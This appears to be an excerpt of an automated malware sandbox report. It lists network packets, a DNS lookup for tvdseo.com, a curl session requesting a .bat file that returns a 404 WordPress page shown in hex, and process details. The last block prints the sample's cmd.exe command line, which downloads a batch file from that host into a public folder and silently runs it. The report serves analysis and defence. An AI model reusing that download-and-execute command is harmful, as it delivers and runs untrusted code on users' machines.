Nov 25, 2024 18:01:26.093796968 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:26.093806028 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:26.094206095 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:26.100426912 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:26.143376112 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:26.957967997 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:26.958012104 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:26.958039045 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:26.958060980 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:26.958091974 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:26.958122015 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:26.958151102 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:26.958151102 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:26.958163023 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:26.958203077 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:26.966497898 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:26.966553926 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:26.966562033 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:26.982729912 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:26.982786894 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:26.982794046 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.032006979 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.079507113 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.125925064 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.125936985 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.171958923 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.172008038 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.172017097 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.181492090 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.181546926 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.181551933 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.189717054 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.189778090 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.189789057 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.197734118 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.197784901 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.197791100 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.205950975 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.206000090 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.206006050 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.214006901 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.214051008 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.214056015 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.222382069 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.222446918 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.222451925 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.228838921 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.228885889 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.228892088 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.235788107 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.235816002 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.235836029 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.235842943 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.235881090 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.242336988 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.249017954 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.249068975 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.249075890 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.297656059 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.297663927 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.344688892 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.378290892 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.380759954 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.380810022 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.380819082 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.387625933 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.387670040 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.387676001 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.397861958 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.397870064 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.397921085 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.397927046 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.407299042 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.407366037 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.407371998 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.407416105 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.417125940 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.417145014 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.417179108 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.421861887 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.421917915 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.421924114 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.421971083 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.426517010 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.431642056 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.431710958 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.431724072 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.431766987 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.441090107 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.441181898 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.450699091 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.450901985 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.460351944 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.460416079 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.460447073 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.460500956 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.590754986 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.590828896 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.597778082 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.597836971 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.601851940 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.601908922 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.606153965 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.606209993 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.606257915 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.606307983 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.606363058 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.606501102 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:27.606563091 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.615763903 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:27.615775108 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 18:01:24.546983004 CET | 60623 | 53 | 192.168.2.7 | 1.1.1.1
Nov 25, 2024 18:01:24.685667038 CET | 53 | 60623 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 25, 2024 18:01:24.546983004 CET | 192.168.2.7 | 1.1.1.1 | 0xacc3 | Standard query (0) | tvdseo.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 25, 2024 18:01:24.685667038 CET | 1.1.1.1 | 192.168.2.7 | 0xacc3 | No error (0) | tvdseo.com | - | 104.21.81.137 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:01:24.685667038 CET | 1.1.1.1 | 192.168.2.7 | 0xacc3 | No error (0) | tvdseo.com | - | 172.67.189.157 | A (IP address) | IN (0x0001) | false
                                • tvdseo.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49703 | 104.21.81.137 | 443 | 5916 | C:\Windows\SysWOW64\curl.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 17:01:26 UTC | 87 | OUT | GET /file/quan.bat HTTP/1.1
                                Host: tvdseo.com
                                User-Agent: curl/7.83.1
                                Accept: */*
2024-11-25 17:01:26 UTC | 1083 | IN | HTTP/1.1 404 Not Found
                                Date: Mon, 25 Nov 2024 17:01:26 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                x-powered-by: PHP/8.2.15
                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                cache-control: no-cache, must-revalidate, max-age=0
                                link: <https://tvdseo.com/wp-json/>; rel="https://api.w.org/"
                                vary: Accept-Encoding
                                platform: hostinger
                                panel: hpanel
                                content-security-policy: upgrade-insecure-requests
                                x-turbo-charged-by: LiteSpeed
                                cf-cache-status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nvEicoSiJDmB7Y12x6ziuTJeaIUpVBDygvw6DEwaKrs7dK7%2B7cZzJIvvg7Fp1CiMmSsBnAC0n%2Bf1Vxjc3rEWpZ9cWbvlmqOvuCln4fcZY197F64mB5CRw8OHYw%2Bz"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8e83335fdaa0422b-EWR
                                alt-svc: h3=":443"; ma=86400
                                server-timing: cfL4;desc="?proto=TCP&rtt=2178&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=725&delivery_rate=1332116&cwnd=234&unsent_bytes=0&cid=f60b1835723be41a&ts=887&x=0"
2024-11-25 17:01:26 UTC | 286 | IN | Data Raw: 36 61 30 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 76 69 22 20 63 6c 61 73 73 3d 22 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 68 74 6d 6c 29 7b 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d
                                Data Ascii: 6a04<!DOCTYPE html><html lang="vi" class="loading-site no-js"><head><meta charset="UTF-8" /><link rel="profile" href="https://gmpg.org/xfn/11" /><link rel="pingback" href="https://tvdseo.com/xmlrpc.php" /><script>(function(html){html.classNam
2024-11-25 17:01:26 UTC | 1369 | IN | Data Raw: 6f 2d 6a 73 5c 62 2f 2c 27 6a 73 27 29 7d 29 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 3c 21 2d 2d 20 43 68 e1 ba bf 20 c4 91 e1 bb 99 20 c4 91 e1 bb 93 6e 67 20 c3 bd 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 64 61 74 61 4c 61 79 65 72 20 c4 91 c6 b0 e1 bb a3 63 20 74 68 c3 aa 6d 20 62 e1 bb 9f 69 20 53 69 74 65
                                Data Ascii: o-js\b/,'js')})(document.documentElement);</script><meta name='robots' content='noindex, follow' /><meta name="viewport" content="width=device-width, initial-scale=1" />... Ch ng Google tag (gtag.js) dataLayer c thm bi Site
                                2024-11-25 17:01:26 UTC1369INData Raw: 49 22 2c 22 46 52 22 2c 22 47 42 22 2c 22 47 52 22 2c 22 48 52 22 2c 22 48 55 22 2c 22 49 45 22 2c 22 49 53 22 2c 22 49 54 22 2c 22 4c 49 22 2c 22 4c 54 22 2c 22 4c 55 22 2c 22 4c 56 22 2c 22 4d 54 22 2c 22 4e 4c 22 2c 22 4e 4f 22 2c 22 50 4c 22 2c 22 50 54 22 2c 22 52 4f 22 2c 22 53 45 22 2c 22 53 49 22 2c 22 53 4b 22 5d 2c 22 77 61 69 74 5f 66 6f 72 5f 75 70 64 61 74 65 22 3a 35 30 30 7d 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 20 4b e1 ba bf 74 20 74 68 c3 ba 63 20 74 68 e1 ba bb 20 47 6f 6f 67 6c 65 20 28 67 74 61 67 2e 6a 73 29 20 63 68 e1 ba bf 20 c4 91 e1 bb 99 20 c4 91 e1 bb 93 6e 67 20 c3 bd 20 64 61 74 61 4c 61 79 65 72 20 c4 91 c6 b0 e1 bb a3 63 20 74 68 c3 aa 6d 20 62 e1 bb 9f 69 20 53 69 74 65 20 4b 69 74 20 2d 2d 3e 0a 09 09 09 0a 09 3c 21
                                Data Ascii: I","FR","GB","GR","HR","HU","IE","IS","IT","LI","LT","LU","LV","MT","NL","NO","PL","PT","RO","SE","SI","SK"],"wait_for_update":500}</script>... Kt thc th Google (gtag.js) ch ng dataLayer c thm bi Site Kit --><!
                                2024-11-25 17:01:26 UTC1369INData Raw: 63 74 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 76 69 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 33 2f 63 72 6f 70 70 65 64 2d 4c 4f 47 4f 2d 54 56 44 2d 53 45 4f 2d 56 55 4f 4e 47 2e 70 6e 67 22 2c 22 63 6f 6e 74 65 6e 74 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 33 2f 63 72 6f 70 70 65 64 2d 4c 4f 47 4f 2d 54 56 44 2d 53 45 4f 2d 56 55 4f 4e 47 2e 70 6e 67 22 2c 22 77 69 64 74 68 22 3a
                                Data Ascii: ct","inLanguage":"vi","@id":"https://tvdseo.com/#/schema/logo/image/","url":"https://tvdseo.com/wp-content/uploads/2023/03/cropped-LOGO-TVD-SEO-VUONG.png","contentUrl":"https://tvdseo.com/wp-content/uploads/2023/03/cropped-LOGO-TVD-SEO-VUONG.png","width":
                                2024-11-25 17:01:26 UTC1369INData Raw: 6c 65 3d 22 44 e1 bb 8b 63 68 20 56 e1 bb a5 20 53 45 4f 20 20 26 72 61 71 75 6f 3b 20 44 c3 b2 6e 67 20 62 c3 ac 6e 68 20 6c 75 e1 ba ad 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72
                                Data Ascii: le="Dch V SEO &raquo; Dng bnh lun" href="https://tvdseo.com/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUr
                                2024-11-25 17:01:26 UTC1369INData Raw: 62 5c 75 64 62 34 30 5c 75 64 63 37 66 22 29 3b 63 61 73 65 22 65 6d 6f 6a 69 22 3a 72 65 74 75 72 6e 21 6e 28 65 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 3f 6e 65 77 20 4f 66 66 73 63 72 65 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c
                                Data Ascii: b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),
                                2024-11-25 17:01:26 UTC1369INData Raw: 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 65 29 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 3d 3d 74 26 26 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 74
                                Data Ascii: te(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.support
                                2024-11-25 17:01:26 UTC1369INData Raw: 2d 66 61 6d 69 6c 79 3a 20 27 47 6f 6f 67 6c 65 53 61 6e 73 27 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 73 72 63 3a 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 30 39 2f 47 6f 6f 67 6c 65 53 61 6e 73 2d 42 6f 6c 64 2e 74 74 66 27 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 3b 0a 7d 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 47 6f 6f 67 6c 65 53 61 6e 73 27 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 09 73 72 63 3a 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32
                                Data Ascii: -family: 'GoogleSans';font-weight: 700;src: url('https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Bold.ttf') format('truetype');}@font-face {font-family: 'GoogleSans';font-weight: 400;src: url('https://tvdseo.com/wp-content/uploads/202
                                2024-11-25 17:01:26 UTC1369INData Raw: 23 37 61 30 30 64 66 3b 2d 2d 77 70 2d 62 6c 6f 63 6b 2d 73 79 6e 63 65 64 2d 63 6f 6c 6f 72 2d 2d 72 67 62 3a 31 32 32 2c 30 2c 32 32 33 3b 2d 2d 77 70 2d 62 6f 75 6e 64 2d 62 6c 6f 63 6b 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 77 70 2d 62 6c 6f 63 6b 2d 73 79 6e 63 65 64 2d 63 6f 6c 6f 72 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 3a 72 6f 6f 74 7b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 62 6f 72 64 65 72 2d 77 69 64 74 68 2d 66 6f 63 75 73 3a 31 2e 35 70 78 7d 7d 2e 77 70 2d 65 6c 65 6d 65 6e 74 2d 62 75 74 74 6f 6e 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 3a 72 6f 6f 74 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6e 6f 72 6d 61 6c 3a 31 36 70 78 3b 2d 2d 77 70 2d
                                Data Ascii: #7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color)}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root{--wp--preset--font-size--normal:16px;--wp-
                                2024-11-25 17:01:26 UTC1369INData Raw: 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 68 75 67 65 29 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 6c 65 66 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 23 65 6e 64 2d 72 65 73 69 7a 61 62 6c 65 2d 65 64 69 74 6f 72 2d 73 65 63 74 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 7d 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d 6c 65 66 74 7b 6a 75 73 74 69 66
                                Data Ascii: nt-size:var(--wp--preset--font-size--huge)}.has-text-align-center{text-align:center}.has-text-align-left{text-align:left}.has-text-align-right{text-align:right}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justif



                                Target ID:0
                                Start time:12:01:23
                                Start date:25/11/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat
                                Imagebase:0x410000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
